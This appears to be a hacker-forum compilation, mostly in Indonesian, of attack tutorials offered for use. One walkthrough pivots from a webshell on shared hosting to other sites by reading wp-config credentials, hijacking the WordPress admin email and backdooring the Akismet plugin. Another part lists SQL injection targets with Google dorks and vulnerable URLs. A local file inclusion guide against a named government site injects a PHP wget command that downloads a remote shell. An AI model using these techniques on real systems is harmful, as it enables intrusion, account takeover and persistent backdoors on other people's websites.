(Tutor Newbie): Jumping web Via Backdoor.

>>>: Pertama..saya anggap kalian sudah punya Target website hasil perkosa dan sudah di tanam backdoor/webshell. S
elanjutnya download : "b374klompat" silahkan Upload di Backdoor kalian dan jalankan.

>>>: Eksekusi file b374klompat di Bar Url Addres, selanjutnyat 

Klik "Kamar Sebelah". keliatan disitu ada beberapa Directory file website lain'y. 

Selanjut'y Copas satu directory yg mo di jumping misalkan 

"/home/chaerlovesempak/public_html/" 

and paste di Address bar and Klik "GO" : 
Screensyut :

setelah itu cari nama file sesuai tempat hostingan/web, 

misalkan wordpress  

wp_config,

Joomla  

configuration.php, config.php  

atau  

koneksi.php

kebetulan target yg saya jumping ini menggunakan wordpress, 

berarti kita cari nama file  

wp_config 

 kalo udah ketemu silahkan bedah file tersebut.

Isi file'y seperti ini :

/** MySQL database username */
define('DB_USER', 'chaerusername');


/** MySQL database password */
define('DB_PASSWORD', 'chaerpassword'

Setelah qta mengetahui isi dari file wp_config, selanjutnya 

klik "Koneksi MYSQL"  

masukan username & Password'y dan 

Klik "Connect". 

jreeng...keluar struktur database'y. 

Ok..guys sekarang tugas qta mencari nama database password & Username Admin, (Select DB). 

 

Saya mendapatkan nama DB 

 "chaerlovesempak" 

 silahkan diklik aja dan liat isi database'y. 

Karena target menggunakan wordpress biasa'y nama db admin 

 wp_users ok..klik saja  

wp_users. 

Tarraaa....sekarang qta sudah punya username & Password admin, 

 user_login :admin, user_pass 

:$P$BEqrb7eTmYy36Nv1YlJY8rEDwhkJQX1 

 tetapi password'y masih di Encrypt. Wahh...

skrg tugas qta berat lagi donk hrs decrypt password, 
Don't panic...qta reset aja password'y via e-mail, 
hahay...!!! (dari pd puyeng cari decrypt). 
Cara reset password e-mail silakan kalian liat di pojok kanan lalu Klik icon 

 "Kertas & Pensil" (Edit). 

ok..kalo udah silahkan kalian ganti e-mail'y menggunakan e-mail kalian masing2, kalo udah

klik "Confirm".

Ok..selanjut'y qta cari halaman admin website si mpunya db tersebut, cara'y 

klik wp_options  

tuwh..nama domain'y udah keliatan, skrg qta reset password admin/Lost password. Let's..go !!! 

http://www.chaerlovesempak.com/wp-login.php?action=lostpassword

Lalu masukan e-mail kalian, 

Klik "Get New Password"  

nanti ada Notifikasi ke E-mail kalian, silahkan di buka dulu e-mail'y. 

Lalu klik confirmasi perubahan password yg dikirim ke e-mail kalian. 

(kalo kalian biasa gonta-ganti password di facebook via e-mail mungkin sudah terbiasa dgn cara ini).

udah diKlik..notifikasi wordpress yg dikirim via e-mail, nanti'y akan di redirect ke halaman login admin untuk konfirmasi perubahan password. Next silahkan isi password sesuka hati. 

Ok...setelah kita masuk website'y dan menjadi admin, tahap berikut'y tinggal pasang backdoor.

Kita pasang backdoor melalui plugins wordpress, silahkan diklik dan diliat 

apa saja plugins yang terinstal di website tersebut. 

disini website tersebut memakai plugins akismet, ok..selanjut'y di klik saja dan 

 "Edit"  

ganti source code plugins akismet dengan source backdoor kalian lalu 

klik "Update File". 

Ok..Sekarang kita Cek apa backdoor kita benar2 sdh terpasang,

http//:www.chaerlovesempak/wp-content/plugins/akismet/akismet.php

Taraaa.... backdoor sudah terpasang.  Selanjutnya terserah kalian.

::Thank's to author b374klompat & family's devilzc0de::

--------------------------------------------------------Pacth----------------------------------------------------------------------- (Continue)..

(Continue)..

Mengeject CD-Rom diLinux

~$ cat baby_roker.sh

#!/bin/sh
while [1=1]
do
    #eject cdrom
    eject

    #pull cd rom tray back in
    eject -t
done

--------------- (Continue)..

(Continue)..

Sql Injection Bugs , Exploit 2

-------------------------------------------------------------------

# Exploit Title: MYRE Real Estate Software SQL Injection Vulnerability

# Google Dork: intext:MYRE Real Estate Software

# Date: 14/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://myrephp.com/realestate/

# Tested on: Windows 7


# http://myrephp.com/realestate/agent/48-adam-lee.html

# http://myrephp.com/realestate/agent/48’a-adam-lee.html


---------------------------------------------------------------------

#############################################################

# Exploit Title: Epiplopoios.gr SQL Injection Vulnerability

# Google Dork: intext:Powered by Epiplopoios.gr

# Date: 14/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.mostra-kouzina.gr/

# Tested on: Windows 7

# Greetz : HeRoTuRk ,Err0r, Darkknight , Bug Researchers Members

# http://www.mostra-kouzina.gr/furniture.php?lang=gr&id=452

# http://www.mostra-kouzina.gr/furniture.php?lang=gr&id=452’a

#############################################################

-----------------------------------------------------------------



# Exploit Title: BlueSoft Classifieds Script SQL Injection Vulnerability

# Google Dork: intext:Powered by BlueSoft Classifieds Script

# Date: 17/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.shopbluesoft.com/demo3

# Tested on: Windows 7
# Greetz : HeRoTuRk ,Err0r , Darkknight , Bug Researchers Members


# http://shopbluesoft.com/demo3/search.php?c=47

# http://shopbluesoft.com/demo3/search.php?c=47’a



----------------------------------------------------------------------------

# Exploit Title: BlueSoft Auction Site SQL Injection Vulnerability

# Google Dork: intext:BlueSoft Auction Site

# Date: 17/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.shopbluesoft.com/demo4

# Tested on: Windows 7

# Greetz : HeRoTuRk ,Err0r , Darkknight , Bug Researchers Members

# http://shopbluesoft.com/demo4/item.php?id=94edd43315507ad8509d7bfb2d2bc936

# http://shopbluesoft.com/demo4/item.php?id=94edd43315507ad8509d7bfb2d2bc936’a

---------------------------------------------------------------------------------



# Exploit Title: The Social Networking CMS SQL Injection Vulnerability

# Google Dork: intext:The Social Networking CMS

# Date: 17/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.shopbluesoft.com/demo

# Tested on: Windows 7

# Greetz : HeRoTuRk ,Err0r , Darkknight , Bug Researchers Members


# http://shopbluesoft.com/demo/user_profile.php?view=photo&photo_id=82

# http://shopbluesoft.com/demo/user_profile.php?view=photo&photo_id=82’a



------------------------------------------------------------------------------



# Exploit Title: BlueSoft RELCMS v2 SQL Injection Vulnerability

# Google Dork: intext:Powered by BlueSoft RELCMS v2

# Date: 17/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.shopbluesoft.com/demo5/

# Tested on: Windows 7
# Greetz : HeRoTuRk ,Err0r , Darkknight , Bug Researchers Members


# http://www.shopbluesoft.com/demo5/search.php?realtor=2

# http://www.shopbluesoft.com/demo5/search.php?realtor=2’a





----------------------------------------------------------------------------------



# Exploit Title: Auto Mobiles SQL Injection Vulnerability

# Date: 15/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.ajdemos.com/demo/ajclassifieds/demo/index.php?template=ajmeauto

# Tested on: Windows 7

# Greetz : HeRoTuRk ,Err0r , Darkknight , Bug Researchers Members

# http://www.ajdemos.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77

# http://www.ajdemos.com/demo/ajclassifieds/classifiedsauto/index.php?do=detaillisting&listingid=77’a



-------------------------------------------------------------------------------------



# Exploit Title: EasyEstateRental SQL Injection Vulnerability

# Google Dork: intext:EasyEstateRental.com

# Date: 14/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.easyestaterental.net/demo/

# Tested on: Windows 7


# http://www.easyestaterental.net/demo/uk/site_location.php?s_location=46

# http://www.easyestaterental.net/demo/uk/site_location.php?s_location=46’a

-------------------------------------------------------------------------------------



# Exploit Title: Auto Web Toolbox SQL Injection Vulnerability

# Google Dork: intext:Auto Web Toolbox

# Date: 14/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://www.autowebtoolbox.com/

# Tested on: Windows 7


# http://www.autowebtoolbox.com/inventory/details.php?id=496

# http://www.autowebtoolbox.com/inventory/details.php?id=496’a



-------------------------------------------------------------------------------------



# Exploit Title: Örümcekoyun SQL Injection Vulnerability

# Google Dork: intext:Ücretsiz Flash Oyun Scripti kullanýlarak hazýrlanmýþtýr.

# Date: 14/07/2011

# Author: Lazmania61 | Bug Researchers

#Demo : http://demo.orumcekoyun.com/

# Tested on: Windows 7
# Greetz : HeRoTuRk ,Err0r, Darkknight , Bug Researchers Members


# http://demo.orumcekoyun.com//raporet.php?id=1

# http://demo.orumcekoyun.com//raporet.php?id=1’a

------------------------------------Patch------------------------------------------------------------------ (Continue)..

(Continue)..

LFI- local file inclusion

Lets Starts 

Few Things You Need to Start 

1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/
4) Mozilla Firefox Browser 


First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: http://www.bislig.gov.ph/content1.php?
page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:

http://www.bislig.gov.ph/content1.php?
page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ


Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.

Now make new user-agentGo to New > New User-Agent
You will get something like this:

<?php phpinfo();?>

Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.

Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)


Go to your site and refresh it.
You should get something like this in your site.

Now search for "disable_functions" (Ctrl+F Search function)
Mine is

disable_functions     | no value    | no value

That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:

<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.

~~~~~~~~~~~~~~~~~~~~~~~Patch~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(Continue)..

(Continue)..